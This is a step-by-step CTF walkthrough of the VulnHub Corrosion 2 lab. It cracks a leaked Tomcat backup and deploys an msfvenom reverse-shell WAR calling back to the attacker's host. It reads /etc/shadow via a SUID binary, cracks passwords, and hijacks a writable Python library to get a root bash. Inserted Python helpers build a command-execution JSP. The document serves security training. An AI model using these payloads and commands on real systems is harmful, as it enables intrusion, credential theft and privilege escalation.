
Corrosion 2

About this machine: VulnHub

Operating system: Linux

Skills used:

  • Note: on this machine an internal network is configured so that we can pivot to Corrosion 1

  • Web Enumeration

  • Information Leakage + Cracking ZIP File

  • Abusing Tomcat - Creating a malicious WAR file [RCE]

  • Abusing SUID Binary - Reading privileged files

  • Cracking Hashes

  • Manipulating the code of a Python library with incorrectly configured permissions [Privilege Escalation]

  • EXTRA: Pivoting Lab with Corrosion 1

Methodology:

Nmap full TCP port scan (-T5 is fine on a local lab network, but it can drop ports over slower links, so rerun with -T4 if a service you expect is missing):

❯ nmap -p- -n -T5 --open 192.168.1.142

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 22:32 EDT
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 51.76% done; ETC: 22:32 (0:00:05 remaining)
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.67% done; ETC: 22:32 (0:00:01 remaining)
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.08% done; ETC: 22:32 (0:00:00 remaining)
Nmap scan report for 192.168.1.142
Host is up (0.00100s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open proxy
MAC Address: 00:0C:29:6C:73:2D (VMware)

Now a script and version scan against the three open ports:

❯ nmap -p22,80,8080 -sVC -T5 192.168.1.142 -oN sV_scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 22:35 EDT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 22:35 (0:00:06 remaining)
Nmap scan report for 192.168.1.142
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6a:d8:44:60:80:39:7e:f0:2d:08:2f:e5:83:63:f0:70 (RSA)
| 256 f2:a6:62:d7:e7:6a:94:be:7b:6b:a5:12:69:2e:fe:d7 (ECDSA)
|_ 256 28:e1:0d:04:80:19:be:44:a6:48:73:aa:e8:6a:65:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http-proxy Tomcat
MAC Address: 00:0C:29:6C:73:2D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 only serves the Apache2 default page (the http-title in the scan above confirms it), so there is nothing to see in the browser.

We use Gobuster to brute-force directories on it:

❯ gobuster dir -u http://192.168.1.142/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.1.142/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
/server-status (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
Finished

Nothing useful on port 80, so we move to port 8080, this time also asking for .zip and .txt files (-x appends each extension to every word in the list):

❯ gobuster dir -u http://192.168.1.142:8080/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x zip,txt
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.1.142:8080/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/backup.zip (Status: 200) [Size: 33723]
/readme.txt (Status: 200) [Size: 153]
/manager (Status: 302) [Size: 0] [--> /manager/]
Finished

We get a backup archive and a text file; let's look at both (screenshot):

The readme says: "Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it. Also remember to use that password I gave you."

Now we try to unzip the backup, but it is password protected. zip2john turns the archive into a hash that John the Ripper can attack; the informational lines go to stderr, so they still show up when stdout is redirected to a file (screenshot):

❯ zip2john backup.zip > hash

ver 2.0 efh 5455 efh 7875 backup.zip/catalina.policy PKZIP Encr: TS_chk, cmplen=2911, decmplen=13052, crc=AD0C6FDB ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/context.xml PKZIP Encr: TS_chk, cmplen=721, decmplen=1400, crc=59B9F4E7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.properties PKZIP Encr: TS_chk, cmplen=2210, decmplen=7276, crc=1CD3C095 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xml PKZIP Encr: TS_chk, cmplen=626, decmplen=1149, crc=748A87A6 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xsd PKZIP Encr: TS_chk, cmplen=862, decmplen=2313, crc=3B44D150 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/logging.properties PKZIP Encr: TS_chk, cmplen=1076, decmplen=4144, crc=1D6C26F7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/server.xml PKZIP Encr: TS_chk, cmplen=2609, decmplen=7589, crc=F91AC0C0 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xml PKZIP Encr: TS_chk, cmplen=1167, decmplen=2972, crc=BDCB08B9 ts=B0E3 cs=b0e3 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xsd PKZIP Encr: TS_chk, cmplen=858, decmplen=2558, crc=E8F588C2 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/web.xml PKZIP Encr: TS_chk, cmplen=18917, decmplen=172359, crc=B8AF6070 ts=6920 cs=6920 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

❯ cat hash

backup.zip:$pkzip$81108246920948f83df8e3188341e0c4ced81b85ffe507a30f1c8bb3d60d228d81ba45b3044c40d51f41082469206af6b41285729172215c7a912286e6312228c5142b6e537384c0ad6b9a6e40b2de98422e108246920d042ed9f0787c684de489fd42ddd00403556c0caaeeabff6ca78e998731732959a1a7adf108246920034f00f26675d81f70f7de491b1c645f15032c9ab52aa2c6157156996a72a9a6a138c8e610824b0e39f16689c61f4dc5fb5405d409a9c4814354c0dba919313e1903a9580daa135342c46fea31082469207046a2cc2a19fdf9e44c52bdd3b1a9d458ca7e751d2ec883c4d808c79087fb2606344d591082469206ae99725253d7986459879f818798e0fe14dd1a533635704c24831f0acbceab71f99b2842027247d748a87a617dd4e82726920502768ce9a11db8105560cdc8ea3b12cb91e5fa10d15b79fdc5335826c2f4a6e4112818ff5cce6e766548eef59eafabd29a2c2de3308487c980603b3867bb62bb60e65451a1fd9bb068ff01a4c2e98a8bbb56dd0f392338b147324bbd34ab2e63d2b80882029705f3803ead22980591ea52cab28fad58ad94838283fd7e267478f9a3e7f645f60ca4d0a227cef99c3db46184f8521dc4dd30f4102ad006dd04a7d054a9018f55730511ccd34bd15a50ebbd1012d4ba320b23fa925ede6d62e3929c137b959813290f0bf0e2a9ca075d1b6b511fb525a5289c32d29365132e25432f855f982f37e4a5fde6901e8f889218d987067920133a4b26ceecc5f3d28f40cb33601cff6f803b0eb900a183ef9e13d7e888fc9770fdb9d01ced0c6969f5df03fdce418da1d979220b430bee9dc21fa63f33b2c1f7b99f848ca5b618d0b6d6eb56ec3748595f1ca1c01492d6464fd1cf73ecd92b6bea1bccc9b8795b1d6087e9205b8e6c5122f83e3625c145b563e1763578d002e0feea455a19d74831c64f69440a3cbcb7b679f683c238984873b7a80df997f11e5d924fe98d1baef30bfce5efb613e82eab136e3844b0e326508b1dac80b2f863b35efdbfa95138d9994699da813c8bb8bc4e7c885b851db53f85d8f1d39f32dfda36477a64821ea03e444866882c6b64d446feb650780e26fab3701fd0743ac26cacefde996ccfe538776ea101c1d3aec81660613bd65eb34569139ee0845e7f7d1e8b12f8ed43ef58e9580c58ab2cfe170981c72256b4b12cc152771546d0ea9077d368c3ddc2c63819b00b3dd3581ab8908561cd8ad722c21d9a891922d8b52444f4fca9278a1a96e926cf19125ec20a327e8a3ab0aa2b05d4348*$/pkzip$::backup.zip:jaspic-providers.xml, context.xml, tomcat-users.xsd, jaspic-providers.xsd, logging.properties, tomcat-users.xml, catalina.properties, server.xml:backup.zip

With the hash in hand we run John against the rockyou wordlist to recover the plaintext password:

❯ john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@administrator_hi5 (backup.zip)
1g 0:00:00:05 DONE (2025-05-05 23:48) 0.1949g/s 2240Kp/s 2240Kc/s 2240KC/s @lexus1s..<3missrusby<3
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We have the password, @administrator_hi5; now we unzip backup.zip:

❯ unzip backup.zip

Archive: backup.zip
[backup.zip] catalina.policy password:
inflating: catalina.policy
inflating: context.xml
inflating: catalina.properties
inflating: jaspic-providers.xml
inflating: jaspic-providers.xsd
inflating: logging.properties
inflating: server.xml
inflating: tomcat-users.xml
inflating: tomcat-users.xsd
inflating: web.xml

❯ ls

 backup.zip  context.xml  jaspic-providers.xsd  tomcat-users.xml
 catalina.policy  hash  logging.properties  tomcat-users.xsd
 catalina.properties  jaspic-providers.xml  server.xml  web.xml

❯ cat tomcat-users.xml

Inside tomcat-users.xml we find an administrator account in clear text: username="manager" password="melehifokivai" roles="manager-gui". The manager-gui role is what grants access to the browser-based Manager application, including its WAR upload form:
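Rather than eyeballing the XML, the following added Python example (not part of the original writeup) parses a tomcat-users.xml and states what each account can do: whether the stored password is plaintext or a Tomcat digest, and which Manager endpoints its roles unlock. The sample file is constructed; it contains the manager account above plus two invented accounts, and the role-to-endpoint table follows Tomcat's documented Manager roles.

```python
"""Parse tomcat-users.xml and say what each account can actually do.

Added example, not from the original writeup. SAMPLE_TOMCAT_USERS is constructed:
the manager account is the one recovered from backup.zip above, the other two
are invented to show the remaining outcomes. The role-to-endpoint table follows
Tomcat's documented Manager roles.
"""
import xml.etree.ElementTree as ET

SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="manager" password="melehifokivai" roles="manager-gui"/>
  <user username="deployer" password="s3cret" roles="manager-script,manager-status"/>
  <user username="viewer" password="readonly" roles="manager-status"/>
</tomcat-users>
"""

# Manager role -> the interface it unlocks (Tomcat 7 and later).
DEPLOY_ROUTES = {
    "manager-gui": "/manager/html  (browser UI, WAR upload form; requests carry a CSRF nonce)",
    "manager-script": "/manager/text  (scriptable: curl -u user:pass -T app.war '.../text/deploy?path=/app')",
    "manager-jmx": "/manager/jmxproxy  (JMX proxy; no deployment)",
    "manager-status": "/manager/status  (read-only server status)",
}
CAN_DEPLOY = {"manager-gui", "manager-script"}


def parse_tomcat_users(xml_text):
    """Return [{'username', 'password', 'roles': [...]}, ...] in file order."""
    root = ET.fromstring(xml_text)
    users = []
    for elem in root.iter():
        if elem.tag.split("}")[-1] != "user":      # tolerate the default namespace
            continue
        roles = [r.strip() for r in elem.get("roles", "").split(",") if r.strip()]
        users.append({"username": elem.get("username"),
                      "password": elem.get("password"),
                      "roles": roles})
    return users


def looks_digested(password):
    """Tomcat stores digested credentials as 'salt$iterations$hex' when a
    CredentialHandler is configured; otherwise the attribute is plaintext."""
    parts = password.split("$")
    return len(parts) == 3 and parts[1].isdigit()


def summarize(xml_text):
    """username -> password, plaintext?, deployable?, reachable Manager endpoints."""
    out = {}
    for u in parse_tomcat_users(xml_text):
        out[u["username"]] = {
            "password": u["password"],
            "plaintext": not looks_digested(u["password"]),
            "deploy": bool(CAN_DEPLOY & set(u["roles"])),
            "routes": [DEPLOY_ROUTES[r] for r in u["roles"] if r in DEPLOY_ROUTES],
        }
    return out


if __name__ == "__main__":
    for name, info in summarize(SAMPLE_TOMCAT_USERS).items():
        tag = "DEPLOY" if info["deploy"] else "no deploy"
        kind = "plaintext" if info["plaintext"] else "digested"
        print(f"{name}:{info['password']}  [{kind}, {tag}]")
        for route in info["routes"]:
            print("    ", route)
```

On this box the account only has manager-gui, so deployment has to go through the HTML form (or a client that fetches and replays the CSRF nonce); the curl one-liner in the table needs manager-script.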

With these credentials we log in to the Tomcat Manager on port 8080 (screenshots):

We're in. Next we build a malicious .war that, once deployed, hands us a shell on the system. msfvenom does it in one command (LHOST is our attacking machine and LPORT the port our listener will use; both are KEY=VALUE options):

❯ msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.136 LPORT=443 -f war -o reverse.war

Payload size: 13033 bytes
Final size of war file: 13033 bytes
Saved as: reverse.war

❯ ls
 reverse.war

With the payload built, we upload reverse.war through the Manager's "WAR file to deploy" form, start a listener on port 443 on our machine (for example nc -nlvp 443), and then click the newly deployed /reverse application in the Manager's list so Tomcat loads the JSP and the reverse shell connects back (screenshots):
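To see what msfvenom actually packed for us, here is an added Python example (not from the original writeup) that builds a minimal deployable WAR by hand with the standard zipfile module. The payload is a plain command-execution JSP (cmd.jsp?cmd=id), simpler to read than the reverse shell used above; the archive name shell.war, the /shell context path and the host values in __main__ are assumptions.

```python
"""Build a minimal Tomcat WAR by hand, to show what msfvenom packs for us.

Added example, not from the original writeup. The payload here is a plain
command-execution JSP (cmd.jsp?cmd=id), simpler to read than the reverse shell
the writeup deployed; the archive name shell.war, the context path and the
host values in __main__ are assumptions.
"""
import io
import zipfile
from urllib.parse import quote

# WEB-INF/web.xml marks the archive as a web application; this servlet 3.0
# descriptor is the minimum Tomcat accepts.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list>
    <welcome-file>{page}</welcome-file>
  </welcome-file-list>
</web-app>
"""

# The JSP runs the 'cmd' query parameter and streams its stdout back to the caller.
CMD_JSP = """<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""


def build_war(page_name="cmd.jsp", jsp_source=CMD_JSP):
    """Return the WAR as bytes: WEB-INF/web.xml plus the JSP at the archive root,
    where Tomcat's JspServlet compiles and serves it on first request."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(page=page_name))
        war.writestr(page_name, jsp_source)
    return buf.getvalue()


def list_war(war_bytes):
    """Entry names inside the archive, to check the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def trigger_url(host, port, context, page_name="cmd.jsp", cmd="id"):
    """URL that runs 'cmd' once Tomcat has deployed the WAR under 'context'.
    The HTML manager deploys shell.war at context /shell (file name minus .war)."""
    return f"http://{host}:{port}/{context}/{page_name}?cmd={quote(cmd)}"


if __name__ == "__main__":
    data = build_war()
    with open("shell.war", "wb") as f:          # assumed output name
        f.write(data)
    print(list_war(data))
    # Upload shell.war through /manager/html (manager-gui, as on this box); with a
    # manager-script account the text interface takes it directly:
    #   curl -u manager:PASS -T shell.war "http://192.168.1.142:8080/manager/text/deploy?path=/shell"
    print(trigger_url("192.168.1.142", 8080, "shell", cmd="id"))
```

A WAR is just a zip with WEB-INF/web.xml inside; anything Tomcat will compile (a JSP) or load (a servlet class) runs with the tomcat user's privileges, which is exactly why a leaked Manager password is a remote code execution, not just an information leak.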

It worked, we have a shell. Now let's look for the flags:

whoami
tomcat

cd /

ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var

cd home

ls
jaye
randy

cd randy

ls
Desktop
Documents
Downloads
Music
note.txt
Pictures
Public
randombase64.py
Templates
user.txt
Videos

cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6

That is the first flag, but we are not root, and this machine is meant to be a pivot to another one, so first we upgrade the raw shell to a full interactive bash with script:

script /dev/null -c bash
ctrl + z
stty raw -echo;fg
reset xterm
tomcat@corrosion:/home/randy$

We now have a full bash and randy's flag, but as tomcat we cannot get into jaye's home directory, so we try the passwords already collected in case one of them is reused:

tomcat@corrosion:/home/randy$ su jaye
Password:

$ bash

We're in. jaye's home holds nothing of interest except a binary in Files that points the way to privilege escalation:

jaye@corrosion:~$ ls

Desktop Downloads Music Public Templates
Documents Files Pictures snap Videos

jaye@corrosion:~$ cd Files

jaye@corrosion:~/Files$ ls

look

This is a SUID copy of look (confirm with ls -l ./look). look prints the lines of a file that begin with a given prefix, so with an empty prefix it dumps the whole file, and because it runs with its owner's privileges it can read /etc/shadow; GTFOBins documents this exact trick. We use it to grab the hashes of other users and crack them with John:

jaye@corrosion:~/Files$ LFILE=/etc/shadow

jaye@corrosion:~/Files$ ./look '' $LFILE

randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
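Before throwing everything at John it helps to triage what look returned. The added Python example below (not from the original writeup) parses shadow lines, separates locked and disabled accounts from crackable ones, names the hash algorithm and the matching john --format, and converts the last-change day count into a date. The sample input is constructed: randy's line is the real one above, the other accounts are invented to show the other cases.

```python
"""Triage /etc/shadow lines before handing them to John.

Added example, not from the original writeup. SAMPLE_SHADOW is constructed:
randy's line is the real one the SUID 'look' returned above; the other
accounts are invented to show locked, disabled and differently hashed entries.
"""
from datetime import date, timedelta

SAMPLE_SHADOW = """\
root:*:18800:0:99999:7:::
daemon:*:18800:0:99999:7:::
randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
jaye:!:18890:0:99999:7:::
tomcat:$y$j9T$saltsaltsaltsalt$hashhashhashhashhashhash:18890:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm name, john --format value)
HASH_TYPES = {
    "$1$": ("md5crypt", "md5crypt"),
    "$2a$": ("bcrypt", "bcrypt"),
    "$2b$": ("bcrypt", "bcrypt"),
    "$2y$": ("bcrypt", "bcrypt"),
    "$5$": ("sha256crypt", "sha256crypt"),
    "$6$": ("sha512crypt", "sha512crypt"),
    # yescrypt (Debian 11 / Ubuntu 22.04 default): john's generic 'crypt' format
    # hands it to libcrypt, which is slow but works on a matching system.
    "$y$": ("yescrypt", "crypt"),
}
EPOCH = date(1970, 1, 1)


def classify(line):
    """Describe one shadow line: who, whether the hash is crackable, which algorithm,
    and the date of the last password change (field 3 is days since 1970-01-01)."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 3:
        raise ValueError(f"not a shadow line: {line!r}")
    user, pw, lastchg = fields[0], fields[1], fields[2]
    info = {"user": user, "crackable": False, "algo": None,
            "john_format": None, "hash": None, "last_change": None}
    if lastchg.isdigit():
        info["last_change"] = (EPOCH + timedelta(days=int(lastchg))).isoformat()
    if pw == "":
        info["algo"] = "empty"          # no password at all
        return info
    if pw.startswith("!"):
        info["algo"] = "locked"         # passwd -l; a real hash may follow the '!', but login is off
        return info
    if pw == "*":
        info["algo"] = "disabled"       # service account, never had a usable password
        return info
    for prefix, (name, fmt) in HASH_TYPES.items():
        if pw.startswith(prefix):
            info.update(crackable=True, algo=name, john_format=fmt, hash=pw)
            return info
    if len(pw) == 13 and not pw.startswith("$"):
        info.update(crackable=True, algo="descrypt", john_format="descrypt", hash=pw)
        return info
    info["algo"] = "unknown"
    return info


def crackable_lines(shadow_text):
    """Group 'user:hash' lines by john format, so each group can be run with an
    explicit --format instead of letting john guess."""
    groups = {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        c = classify(line)
        if c["crackable"]:
            groups.setdefault(c["john_format"], []).append(f"{c['user']}:{c['hash']}")
    return groups


if __name__ == "__main__":
    for line in SAMPLE_SHADOW.splitlines():
        c = classify(line)
        print(f"{c['user']:8} {c['algo']:12} crackable={c['crackable']} last_change={c['last_change']}")
    for fmt, lines in crackable_lines(SAMPLE_SHADOW).items():
        print(f"\n# john --format={fmt} --wordlist=rockyou.txt {fmt}.txt")
        print("\n".join(lines))
```

randy's entry decodes to a sha512crypt hash last changed on 2021-09-18, which matches the September 2021 timestamps on the files in his home directory, and sha512crypt with 5000 rounds is slow enough that a targeted wordlist matters more than raw speed.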

We have randy's hash. We save the whole shadow line to a file (john reads the user:hash format directly) and crack it with john:

❯ cat hash.txt

randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::

❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked password: 07051986randy

With the new password we log in over SSH:

ssh randy@192.168.1.142

The authenticity of host '192.168.1.142 (192.168.1.142)' can't be established.
ED25519 key fingerprint is SHA256:zKtKAXyhL0euYM1nLav6ZWVRGZ4c2NxUZ+mMIU3VImg.
This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '192.168.1.142' (ED25519) to the list of known hosts.

randy@192.168.1.142's password:

We're in. Now the goal is to escalate privileges. First a look at randy's home:

randy@corrosion:~$ ls -l

total 44
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Desktop
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Documents
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Downloads
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Music
-rw-r--r-- 1 root root 283 Sep 20 2021 note.txt
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Pictures
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Public
-rwxr-xr-x 1 root root 210 Sep 20 2021 randombase64.py
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Templates
-rw-rw-r-- 1 randy randy 33 Sep 17 2021 user.txt
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Videos

randombase64.py is owned by root, and through sudo randy may run it as root with /usr/bin/python3.8 (sudo -l lists the rule; the exact command is used below). The script imports base64, so we look for the copy of that library the interpreter loads and check its permissions with ls -l; if randy can write to it, we can alter it to gain privileges:

randy@corrosion:/$ find / -name base64.py 2>/dev/null

/snap/core18/2128/usr/lib/python3.6/base64.py
/snap/core18/2855/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/base64.py
/usr/lib/python3.8/base64.py    (this is the one the system's /usr/bin/python3.8 loads; the snap copies are irrelevant)

randy@corrosion:/$ nano /usr/lib/python3.8/base64.py
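Checking by hand which imported library is writable scales badly once a script imports more than one module. Here is that check as an added Python example (not part of the original writeup): given a script root will run and the interpreter's module search path, it lists the imported modules whose source file, or the directory holding it, the unprivileged user can write. It builds a disposable fake library tree in a temp directory (constructed data, with base64.py left at mode 0666 to mirror the target) so it never touches the real /usr/lib/python3.8, and the attacker uid is simulated because root bypasses these permission bits.

```python
"""Find sudo-runnable Python scripts whose imports the unprivileged user can tamper with.

Added example, not from the original writeup. build_lab() constructs a throwaway
fake interpreter tree in a temp directory (base64.py left world-writable, 0666,
to mirror the target box) so nothing under the real /usr/lib is touched. The
attacker uid is simulated because root ignores these permission bits.
"""
import ast
import os
import stat
import tempfile


def imported_modules(script_path):
    """Top-level module names the script imports (import x / from x import y)."""
    with open(script_path, "r", encoding="utf-8") as f:
        tree = ast.parse(f.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def mode_allows_write(st, uid, gids):
    """POSIX DAC check on a stat result for principal (uid, gids): owner bits if the
    uid matches, else group bits if a gid matches, else the 'other' bits."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def writable_imports(script_path, search_path, uid=None, gids=None):
    """Map module -> file for every import whose source file, or the directory
    holding it, the given principal may write. search_path is the target
    interpreter's sys.path in order; the first match is what it would load. A
    writable directory counts too: dropping a new module there shadows a
    read-only one further down the path."""
    uid = os.geteuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    hits = {}
    for mod in sorted(imported_modules(script_path)):
        for directory in search_path:
            candidates = (os.path.join(directory, mod + ".py"),
                          os.path.join(directory, mod, "__init__.py"))
            found = next((c for c in candidates if os.path.isfile(c)), None)
            if found is None:
                continue                       # not in this directory, keep walking the path
            if mode_allows_write(os.stat(found), uid, gids) or \
               mode_allows_write(os.stat(directory), uid, gids):
                hits[mod] = found
            break                              # first hit on the path wins
    return hits


def build_lab():
    """Constructed scenario: a script root runs via sudo imports base64 and os;
    base64.py is 0666 (the misconfiguration), os.py is a sane 0644."""
    root = tempfile.mkdtemp(prefix="pylibhijack-")
    lib = os.path.join(root, "lib", "python3.8")
    os.makedirs(lib)
    os.chmod(lib, 0o755)                       # the directory itself is not writable by others
    for name, mode in (("base64", 0o666), ("os", 0o644)):
        path = os.path.join(lib, name + ".py")
        with open(path, "w") as f:
            f.write("# stand-in for the real module\n")
        os.chmod(path, mode)
    script = os.path.join(root, "randombase64.py")
    with open(script, "w") as f:
        f.write("import base64\nimport os\n"
                "print(base64.b64encode(input('Enter your string: ').encode()).decode())\n")
    # Files are owned by whoever runs this, so 'randy' is any other uid.
    return {"script": script, "path": [lib], "attacker_uid": os.geteuid() + 1}


if __name__ == "__main__":
    lab = build_lab()
    hits = writable_imports(lab["script"], lab["path"], uid=lab["attacker_uid"], gids=[])
    for mod, path in hits.items():
        print(f"[!] {mod} loads from {path}, writable by uid {lab['attacker_uid']}; fix: chmod 644 {path}")
```

On a real target you would pass the script from the sudo rule and the output of /usr/bin/python3.8 -c 'import sys; print(sys.path)' as search_path; the fix on the defending side is the same one the output suggests, restoring 0644 root-owned permissions on the library (and auditing how it got loosened).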

We add one line near the top of the library. Because randombase64.py imports base64, that line runs with root's privileges the moment sudo starts the script, and it sets the SUID bit on /bin/bash (nano's shortcut bar bled into the original capture; only the relevant part of the file is shown):

# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere

import re
import struct
import binascii
import os

os.system("chmod u+s /bin/bash")   # added line: executes as root on import and leaves a SUID bash behind

__all__ = [
    # Legacy interface exports traditional RFC 2045 Base64 encodings
    'encode', 'decode', 'encodebytes', 'decodebytes',
    # Generalized interface for other encodings
    'b85encode', 'b85decode', 'a85encode', 'a85decode',
    # Standard Base64 encoding
    'standard_b64encode', 'standard_b64decode',

We run the script through sudo. Any input works, since the hijacked import has already done its job by the time the prompt appears; afterwards ls -l /bin/bash should show the s bit:

randy@corrosion:/$ sudo /usr/bin/python3.8 /home/randy/randombase64.py

Enter your string: hacked   (any string will do)
aGFja2Vk

randy@corrosion:/$ whoami

randy

randy@corrosion:/$ bash -p   (-p keeps the effective uid granted by the SUID bit instead of dropping it)

bash-5.0# whoami

root

We are root. Now for the last flag:

bash-5.0# cd /root

bash-5.0# ls

root.txt snap

bash-5.0# cat root.txt

2fdbf8d4f894292361d6c72c8e833a4b

With root on this box, the next step is pivoting to Corrosion 1 over the internal network; that part is covered in the Corrosion 1 writeup. This machine is done.


Screenshot captions (images not included): backup.zip; note.txt; backup asking for a password; user and password in tomcat-users.xml; login on port 8080; access to the server; listener on port 443; uploading the .war payload; confirming the upload; clicking the payload to execute it.